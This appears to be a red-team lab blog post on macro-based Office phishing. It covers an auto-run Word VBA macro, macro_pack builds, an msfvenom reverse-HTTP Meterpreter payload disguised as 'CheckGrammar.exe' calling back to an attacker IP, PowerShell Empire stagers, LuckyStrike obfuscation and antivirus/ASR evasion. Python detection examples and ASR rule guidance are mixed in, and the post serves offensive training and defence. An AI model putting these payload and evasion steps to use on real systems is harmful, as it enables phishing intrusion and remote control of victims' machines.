Marco

4 mins
Redteam Phishing Office365 C2

Wrap around
#

Excel
#

MS Word
#

```vb
' Auto-executing macro: runs as soon as the document is opened (after Enable Content)
Private Sub Document_Open()
  MsgBox "game over", vbOKOnly, "game over"
  ' Spawn a child process from Word; calc.exe stands in for a real payload
  a = Shell("calc.exe", vbHide)
End Sub
```

Open the VBA editor with ALT + F11 and paste the macro, save the document as .dotm, and click Enable Content when the document is opened.
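A triage check a defender can run over an inbound attachment, added here as an example and not code from this post: it opens the OOXML zip container and reports whether a vbaProject.bin part or a macroEnabled content type is present, which is exactly what a .dotm saved as above contains. The package bytes are constructed in the block (the vbaProject.bin content is placeholder bytes, not a real VBA project); legacy OLE2 .doc/.xls files have no zip container and need a VBA stream parser such as olevba instead.

```python
import io
import re
import zipfile

# Content-type markers Office writes into [Content_Types].xml for macro-enabled
# packages (.docm, .dotm, .xlsm, .pptm). The VBA project itself is stored as a
# binary OLE part, normally word/vbaProject.bin or xl/vbaProject.bin.
MACRO_CONTENT_TYPE_RE = re.compile(r"application/vnd\.ms-[\w.]*macroEnabled[\w.]*")
VBA_PART_RE = re.compile(r"(?:^|/)vbaProject\.bin$", re.IGNORECASE)


def inspect_ooxml(data: bytes) -> dict:
    """Summarise macro indicators in an OOXML package given its raw bytes.

    Only the zip structure and declared content types are examined; the VBA
    source is not decompressed (that needs a full VBA stream parser).
    """
    result = {"is_zip": False, "vba_parts": [], "macro_content_type": None}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return result  # not OOXML: legacy OLE2 .doc/.xls, or not an Office file at all
    result["is_zip"] = True
    with zf:
        names = zf.namelist()
        result["vba_parts"] = [n for n in names if VBA_PART_RE.search(n)]
        if "[Content_Types].xml" in names:
            ctypes = zf.read("[Content_Types].xml").decode("utf-8", errors="replace")
            match = MACRO_CONTENT_TYPE_RE.search(ctypes)
            if match:
                result["macro_content_type"] = match.group(0)
    return result


def is_macro_enabled(data: bytes) -> bool:
    """True if the package carries a VBA project or declares a macro-enabled type.

    Checking the part name as well as the declared type catches files whose
    extension or content type was edited to look like a plain .docx.
    """
    info = inspect_ooxml(data)
    return bool(info["vba_parts"]) or info["macro_content_type"] is not None


def build_sample_package(with_macro: bool) -> bytes:
    """Build a constructed, minimal Word package in memory for demonstration."""
    if with_macro:
        main_type = "application/vnd.ms-word.template.macroEnabledTemplate.main+xml"  # .dotm
    else:
        main_type = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"  # .docx
    vba_override = (
        '<Override PartName="/word/vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/>'
        if with_macro else ""
    )
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        f'<Override PartName="/word/document.xml" ContentType="{main_type}"/>'
        f"{vba_override}</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # Placeholder bytes (OLE2 magic plus a marker), not a real VBA project
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0CONSTRUCTED-PLACEHOLDER")
    return buf.getvalue()


if __name__ == "__main__":
    for label, flag in (("clean docx", False), ("dotm with macro", True)):
        print(label, "->", inspect_ooxml(build_sample_package(flag)))
```

Run it over real attachments by reading the file bytes into inspect_ooxml; a positive result is a reason to quarantine or route the file to deeper analysis, not proof of malice, since legitimate macro-enabled templates exist.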

ASR (Attack surface reduction)
#

Attack surface reduction rules overview

Attack surface reduction rules reference

Introduced as part of Windows Defender Exploit Guard in Windows 10 1709.

A set of rules, deployed through:

  • Group Policy Objects

Some are very effective:

  • Ex. Block all Office applications from creating child processes.
  • Potential to block 99.9% of all macro-based attacks in the wild.
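To make concrete what the "Block all Office applications from creating child processes" rule enforces, here is a detection pass over process-creation telemetry, added as an example rather than code from this post. It flags any event whose parent image is an Office application, which is the parent/child relationship the macros on this page produce. The log lines are constructed in a simple key=value format (not real Sysmon output), the allow-list is hypothetical, and the Office image set should be extended per the ASR rules reference; the rule id is the one Microsoft documents for this rule.

```python
import ntpath

# Microsoft-documented id of the ASR rule "Block all Office applications from
# creating child processes" (see the ASR rules reference).
ASR_OFFICE_CHILD_PROCESS_RULE = "D4F940AB-401B-4EFC-AADC-AD5F3C50688A"

# Office executables treated as parents of interest. Extend per the rule
# reference; Outlook is covered by a separate "communication application" rule.
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe"}

# Hypothetical allow-list of children that are legitimate in this environment
# (e.g. the printing helper Office launches); tune before deploying.
ALLOWED_CHILDREN = {"splwow64.exe"}


def parse_event(line: str) -> dict:
    """Parse one constructed 'key=value|key=value' process-creation record."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def image_name(path: str) -> str:
    """Lower-cased executable name from a Windows path (ntpath splits on backslashes on any OS)."""
    return ntpath.basename(path).lower()


def suspicious_office_children(lines):
    """Return findings for process-creation events whose parent is an Office app.

    Each finding records the user, the Office parent and the child so an
    analyst sees the same relationship the ASR rule would have blocked.
    """
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "1":  # Sysmon-style process creation id
            continue
        parent = image_name(ev.get("ParentImage", ""))
        child = image_name(ev.get("Image", ""))
        if parent in OFFICE_IMAGES and child not in ALLOWED_CHILDREN:
            findings.append({
                "user": ev.get("User", ""),
                "parent": parent,
                "child": child,
                "command_line": ev.get("CommandLine", ""),
                "asr_rule": ASR_OFFICE_CHILD_PROCESS_RULE,
            })
    return findings


# Constructed sample events (not real telemetry): the first two mirror the
# macro behaviour shown in this post, the last two are benign.
SAMPLE_EVENTS = [
    r"EventID=1|ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|Image=C:\Windows\System32\calc.exe|User=CORP\alice",
    r"EventID=1|ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c notepad.exe|User=CORP\bob",
    r"EventID=1|ParentImage=C:\Windows\explorer.exe|Image=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|User=CORP\alice",
    r"EventID=1|ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|Image=C:\Windows\splwow64.exe|User=CORP\carol",
]

if __name__ == "__main__":
    for f in suspicious_office_children(SAMPLE_EVENTS):
        print(f"[{f['asr_rule']}] {f['user']}: {f['parent']} -> {f['child']} {f['command_line']}")
```

Where the rule is deployed in block mode the child never starts, so the same relationship shows up as a Defender ASR block event rather than a process-creation event; running a detection like this in parallel is useful for finding hosts where the rule is in audit mode or not applied.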

ASR bypass
#

ASR Rules Bypass.vba

Windows Defender Exploit Guard ASR VBScript/JS Rule

Windows Defender Exploit Guard ASR Rules for Office

Generate-Macro
#

Tested on Windows 10 with O365 Home Premium (M365).

During execution, the payload was detected and terminated quickly by built-in antivirus/defender.

(Correct me if I’m wrong or if you’ve observed different behavior.)

macro_pack
#

Using the community edition of macro_pack; more detail in the blog post EXCEL 4.0 XLM macro in MacroPack Pro.

Example:

```
echo "cmd.exe /c notepad.exe" | macro_pack.exe -o -t CMD -G test.xls
```

Some security bypass features:

  • Some anti-reversing features
    • Sandbox detection
    • Hiding macro sheet
    • Obfuscation
  • XLM Injection

This is the community edition. The Pro version unlocks advanced features such as shellcode injection, seamless Meterpreter integration, and extended exploitation capabilities.

Lucky Strike + Powershell Empire
#

Attacker IP (Kali): 192.168.50.2

Victim IP (Windows 10): 192.168.50.3

In this section, I use both Meterpreter and Empire.

Malicious Server Deployment
#

Meterpreter
#

```
$ msfvenom -p windows/meterpreter/reverse_http LPORT=8080 LHOST=192.168.50.2 -f exe -o CheckGrammar.exe
```

```
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST 192.168.50.2
LHOST => 192.168.50.2
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf6 exploit(multi/handler) > run
[*] Started HTTP reverse handler on http://192.168.50.2:8080
```

Empire
#

I use Kali, so installing empire-starkiller is easy.

After that, run it with:

```
sudo powershell-empire server
```

Default admin account

Username: empireadmin

Password: password123

Create Listener
#

Create Stager
#

Create a new stager, set its listener to the http listener created in the previous step, enable Obfuscate mode, and download the resulting payload.

LuckyStrike
#

Transfer the file to the victim machine. There are multiple ways to do this, but I am interested in using a simple HTTP server:

```
python -m http.server 8000
```

Prepare environment
#

Invoke-Obfuscation

Import the Invoke-Obfuscation module, then install luckystrike. If luckystrike reports an error finding the Invoke-Obfuscation module, check PSModulePath and copy or move the Invoke-Obfuscation folder into one of those paths.

Create .xls
#

Meterpreter
#

Create a payload from the malicious exe for reverse HTTP (Meterpreter), configure the payload, and generate the .xls file.

Empire
#

Create a payload from the malicious exe for reverse HTTP (Empire), configure the payload, and generate the .xls file.

Open .xls
#

infected_fNKLTJYV.xls (meterpreter)
#

Click to enable macros, and a shell comes back to the handler.

infected_fNKLTJYV.xls (empire)
#

Open the file, and a new agent is added in Empire; from there the Terminal and File Browser are available.

Attack Rating
#

  • High Realism: Macro-based attacks continue to appear in real-world incidents, targeting both IT and non-IT staff.
  • Social Engineering Factor: Success often relies on persuading the user to click Enable Content, a surprisingly common behavior in corporate environments.
  • Critical Risk: If macros are enabled by default (or policies are poorly enforced), the attack vector becomes a severe vulnerability.
  • Bypassing Defenses: With obfuscation, sandbox detection, and sheet-hiding techniques, many traditional antivirus solutions can be evaded. Advanced variants also bypass some EDR tools by injecting into trusted processes.
  • Persistence & Payload Delivery: Weaponized macros can be chained to download and execute secondary payloads (e.g., Meterpreter, Cobalt Strike), establishing long-term access.
  • Detection Difficulty: When combined with living-off-the-land techniques (e.g., abusing PowerShell or WMI), attribution and detection become harder for defenders.

Tools
#

macro_pack

Generate-Macro

ASR Rules Bypass.vba

luckystrike

Invoke-Obfuscation

References
#

Attack surface reduction rules overview

Attack surface reduction rules reference

Phishing with MS Office

EXCEL 4.0 XLM macro in MacroPack Pro

A guide to creating malicious macro-enabled Excel worksheets

Maldocs: Tips for Red Teamers w/ Didier Stevens - SANS HackFest & Ranges Summit 2020

Uncompromised: Unpacking a malicious Excel macro

Testing initial access with “Generate-Macro” in Atomic Red Team

Windows Red Team Exploitation Techniques | Luckystrike & PowerShell Empire

Windows Defender Exploit Guard ASR VBScript/JS Rule
